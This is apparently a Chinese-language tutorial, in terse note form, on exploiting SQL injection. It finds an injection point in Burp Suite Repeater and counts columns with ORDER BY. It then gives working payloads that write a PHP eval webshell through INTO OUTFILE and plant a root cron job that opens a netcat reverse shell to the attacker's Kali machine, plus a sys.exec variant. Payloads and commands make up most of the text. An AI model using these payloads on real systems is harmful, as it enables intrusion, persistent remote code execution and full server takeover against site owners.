启动burpsuite监听网页
在监听到的页面右键点击Send to Repeater

然后跳转到Repeater
在输入框输入【 ‘ "】
测试是否存在注入点
对username,password进行一个个试。如果存在会返回界面会不一样。
当我们找到注入点
可以进行字符串猜解长度可以理解为是按照一列一列的查看密码的长度。
‘order by 4# 报错
‘order by 3#页面正常
有3个字段
‘union select “”,””,”<?php eval($_GET[cmd]);?>” into outfile “/var/www/888.php”#
将php代码写入/var/www/html下的888。php
union一个操作符,必须SELECT语句组成。
/var/www/html网页文件的路径
into outfile导出多行数据,文件名必须全路径(绝对路径)
dumpfile功能一样但是只能导出一行数据
一句话木马详细解析
写一句话木马(基本操作)
得到webshell
whereis 查看命令的路径
查看nc命令的绝对路径
注当前此linux版本存在nc漏洞,可根据版本更改
更多漏洞
返回/usr/bin/nc.traditional
设定定时任务反弹shell
‘union select “”,””,”* * * * * root /usr/bin/nc.traditional kail的IP 监听端口 –c /bin/sh ” into outfile “/etc/cron.d/666”#
解析* * * * *分别对应 分 时 日 月 周
这里利用的linux的系统定时任务
开启监听!!
一定要监听
nc -nlvp 监听端口等待一分钟后回弹。默认五个*是一分钟
直接连接
通过sys.exec命令来执行命令。
‘union select “”,””,”sys.exec(/usr/bin/nc.traditional –c /bin/sh kail的IP 监听端口)”#
其他注入
03以上老版本使用